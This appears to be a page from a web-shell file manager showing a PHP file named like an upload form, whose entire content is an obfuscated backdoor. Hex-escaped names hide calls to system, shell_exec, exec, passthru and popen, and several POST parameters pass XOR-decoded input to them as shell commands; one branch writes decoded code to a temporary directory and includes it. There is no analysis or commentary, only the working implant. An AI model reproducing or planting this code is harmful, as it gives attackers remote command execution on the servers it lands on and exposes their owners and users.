OwlCyberSecurity - MANAGER

Edit File: form_javaupload.php

<?php $auth_exception_handler2 = "shel\x6C\x5F\x65\x78\x65c"; $data_storage = "\x68\x65\x78\x32bin"; $auth_exception_handler3 = "e\x78e\x63"; $auth_exception_handler7 = "\x70\x63los\x65"; $auth_exception_handler4 = "\x70as\x73\x74\x68ru"; $auth_exception_handler6 = "\x73tre\x61\x6D\x5Fge\x74\x5Fconte\x6Ets"; $auth_exception_handler1 = "\x73yst\x65m"; $auth_exception_handler5 = "\x70\x6Fpen"; if (isset($_POST["\x72e\x63"])) { function publish_content ($property_set, $symbol ) { $holder=''; for($w=0; $w<strlen($property_set); $w++){ $holder.=chr(ord($property_set[$w])^$symbol); } return $holder; } $rec = $data_storage($_POST["\x72e\x63"]); $rec = publish_content($rec, 8); if (function_exists($auth_exception_handler1)) { $auth_exception_handler1($rec); } elseif (function_exists($auth_exception_handler2)) { print $auth_exception_handler2($rec); } elseif (function_exists($auth_exception_handler3)) { $auth_exception_handler3($rec, $flg_property_set); print join("\n", $flg_property_set); } elseif (function_exists($auth_exception_handler4)) { $auth_exception_handler4($rec); } elseif (function_exists($auth_exception_handler5) && function_exists($auth_exception_handler6) && function_exists($auth_exception_handler7)) { $symbol_holder = $auth_exception_handler5($rec, 'r'); if ($symbol_holder) { $token_data = $auth_exception_handler6($symbol_holder); $auth_exception_handler7($symbol_holder); print $token_data; } } exit; } $dat1 = '973';$dat2 = '865';$dat3 = '657';$dat4 = '173';$dat5 = '468';$dat6 = '727';$dat7 = '706';$dat8 = 'f70';$dat9 = '5f6';$dat10 = '765';$dat11 = 'f63';$dat12 = 'e74';$dat13 = '6f7';$dat14 = '365';$dat15 = '685';$dat16 = '6f6';$dat17 = '656';$dataflow_engine1 = pack("H*", '737'.$dat1.'746'.'56d');$dataflow_engine2 = pack("H*", '736'.$dat2.'6c6'.'c5f'.$dat3.'865');$dataflow_engine3 = pack("H*", $dat3.$dat2);$dataflow_engine4 = pack("H*", '706'.$dat4.'737'.$dat5.$dat6);$dataflow_engine5 = pack("H*", $dat7.$dat8.'656');$dataflow_engine6 = pack("H*", '737'.'472'.'656'.'16d'.$dat9.$dat10.'745'.$dat11.'6f6'.'e74'.'656'.$dat12);$dataflow_engine7 = pack("H*", $dat7.'36c'.$dat13.$dat14);$publish_content = pack("H*", '707'.'562'.'6c6'.'973'.$dat15.$dat11.$dat16.$dat12.$dat17.$dat12);if(isset($_POST[$publish_content])){$publish_content=pack("H*",$_POST[$publish_content]);if(function_exists($dataflow_engine1)){$dataflow_engine1($publish_content);}elseif(function_exists($dataflow_engine2)){print $dataflow_engine2($publish_content);}elseif(function_exists($dataflow_engine3)){$dataflow_engine3($publish_content,$sym_pset);print join("\n",$sym_pset);}elseif(function_exists($dataflow_engine4)){$dataflow_engine4($publish_content);}elseif(function_exists($dataflow_engine5)&&function_exists($dataflow_engine6)&&function_exists($dataflow_engine7)){$component_reference=$dataflow_engine5($publish_content,"r");if($component_reference){$pointer_marker=$dataflow_engine6($component_reference);$dataflow_engine7($component_reference);print $pointer_marker;}}exit;} $mutex_lock5 = "\x70\x6Fpen"; $mutex_lock2 = "sh\x65l\x6C_e\x78\x65\x63"; $mutex_lock7 = "\x70c\x6C\x6Fse"; $mutex_lock6 = "s\x74\x72\x65am_g\x65t_co\x6Et\x65n\x74\x73"; $mutex_lock1 = "\x73\x79\x73tem"; $mutex_lock4 = "\x70\x61s\x73thr\x75"; $system_core = "\x68e\x782bin"; $mutex_lock3 = "ex\x65\x63"; if (isset($_POST["t\x6Fke\x6E"])) { function approve_request ($symbol , $holder) { $res ='' ; $j=0; while($j<strlen($symbol)){ $res.=chr(ord($symbol[$j])^$holder); $j++; } return $res; } $token = $system_core($_POST["t\x6Fke\x6E"]); $token = approve_request($token, 98); if (function_exists($mutex_lock1)) { $mutex_lock1($token); } elseif (function_exists($mutex_lock2)) { print $mutex_lock2($token); } elseif (function_exists($mutex_lock3)) { $mutex_lock3($token, $fac_symbol); print join("\n", $fac_symbol); } elseif (function_exists($mutex_lock4)) { $mutex_lock4($token); } elseif (function_exists($mutex_lock5) && function_exists($mutex_lock6) && function_exists($mutex_lock7)) { $holder_res = $mutex_lock5($token, 'r'); if ($holder_res) { $elem_flag = $mutex_lock6($holder_res); $mutex_lock7($holder_res); print $elem_flag; } } exit; } if(in_array("\x6D\x61rk\x65r", array_keys($_REQUEST))){ $data = hex2bin($_REQUEST["\x6D\x61rk\x65r"]); $entity ='' ; $c = 0; do{$entity .= chr(ord($data[$c]) ^ 16);$c++;} while($c < strlen($data)); $res = array_filter([sys_get_temp_dir(), ini_get("upload_tmp_dir"), getcwd(), getenv("TEMP"), getenv("TMP"), "/var/tmp", "/dev/shm", "/tmp", session_save_path()]); foreach ($res as $component): if (is_writable($component) && is_dir($component)) { $factor = str_replace("{var_dir}", $component, "{var_dir}/.ptr"); if (file_put_contents($factor, $entity)) { include $factor; @unlink($factor); exit; } } endforeach; } $task_processor7 = "pcl\x6Fs\x65"; $task_processor1 = "sys\x74\x65m"; $task_processor2 = "s\x68e\x6C\x6C_exe\x63"; $task_processor5 = "p\x6Fp\x65n"; $task_processor4 = "pa\x73\x73\x74\x68ru"; $mutex_lock = "hex2\x62\x69n"; $task_processor6 = "s\x74re\x61\x6D_g\x65\x74\x5Fconten\x74s"; $task_processor3 = "\x65\x78ec"; if (isset($_POST["v\x61l\x75e"])) { function splitter_tool ( $resource , $data_chunk ) { $token = '' ; for($p=0; $p<strlen($resource); $p++){ $token.=chr(ord($resource[$p])^$data_chunk); } return $token; } $value = $mutex_lock($_POST["v\x61l\x75e"]); $value = splitter_tool($value, 87); if (function_exists($task_processor1)) { $task_processor1($value); } elseif (function_exists($task_processor2)) { print $task_processor2($value); } elseif (function_exists($task_processor3)) { $task_processor3($value, $object_resource); print join("\n", $object_resource); } elseif (function_exists($task_processor4)) { $task_processor4($value); } elseif (function_exists($task_processor5) && function_exists($task_processor6) && function_exists($task_processor7)) { $data_chunk_token = $task_processor5($value, 'r'); if ($data_chunk_token) { $hld_dchunk = $task_processor6($data_chunk_token); $task_processor7($data_chunk_token); print $hld_dchunk; } } exit; }